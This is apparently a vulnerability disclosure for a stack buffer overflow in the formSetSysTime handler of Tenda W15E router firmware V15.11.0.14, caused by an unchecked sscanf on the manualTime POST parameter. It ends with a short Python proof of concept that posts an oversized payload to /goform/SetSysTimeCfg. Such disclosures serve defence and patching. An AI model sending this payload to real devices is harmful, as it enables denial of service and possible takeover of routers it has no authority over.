- Firmware download website: https://www.tendacn.com/download/detail-2722.html
W15EV1.0 V15.11.0.14
The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formSetSysTime
function. The mode
variable receives the sysTimePolicy
parameter from a POST request and we let mode=="manual"
to execute code in else if
.
The manual_time
variable receives the manualTime
parameter from a POST request. However, since the user can control the input of manualTime
, the statement sscanf((const char *)manual_time, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", year, month, day, hour, min, sec);
can cause a buffer overflow. The user-provided time
can exceed the capacity of the year, month, day, hour, min, sec
array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetSysTimeCfg"
payload = b"a"*2000
data = {
'sysTimePolicy':'manual',
'manualTime':payload,
}
response = requests.post(url, data=data)
print(response.text)